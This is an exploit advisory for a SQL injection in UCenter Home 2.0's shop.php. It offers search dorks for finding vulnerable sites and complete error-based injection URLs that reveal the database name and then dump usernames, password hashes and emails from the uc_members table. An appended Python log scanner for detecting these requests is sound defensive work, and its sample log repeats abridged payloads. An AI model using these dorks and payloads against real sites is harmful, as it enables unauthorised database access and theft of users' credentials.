__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php

value's : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name in the exploit: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
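
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access logs for `shop.php` hits whose `shopid` is not a plain integer and labels the error-based markers seen in the advisory's requests. The combined log format, the function names, the signature labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log entry (raw spaces tolerated).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers of the error-based (duplicate group key) technique in the advisory.
SIGNATURES = {
    "floor(rand()) grouping": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema access": re.compile(r"information_schema", re.I),
    "nested select": re.compile(r"\(\s*select\b", re.I),
    "uc_members access": re.compile(r"uc_members", re.I),
}

def inspect_line(line):
    """Return the reasons a log line looks like shopid injection (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return []
    reasons = []
    # parse_qs percent-decodes values and maps '+' to a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if not re.fullmatch(r"[0-9]{1,10}", value):
            reasons.append("non-numeric shopid")
        reasons += [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return reasons

def scan(lines):
    """Map 1-based line numbers to reasons for every suspicious line."""
    hits = {}
    for n, line in enumerate(lines, 1):
        reasons = inspect_line(line)
        if reasons:
            hits[n] = reasons
    return hits

# Constructed sample log; line 2 is abridged from the advisory's first request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2010:13:56:01 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 311',
    '198.51.100.7 - - [10/Oct/2010:13:56:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 298',
    '198.51.100.7 - - [10/Oct/2010:13:56:20 +0000] "GET /Shop.php?ac=view&shopid=1+AND+(SeLeCt+1+FROM+uc_members) HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for lineno, why in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(why))
```

Because `shopid` is only ever a numeric identifier in legitimate requests, the non-numeric check alone is a low-noise alert; the signature labels help triage which hits match this advisory.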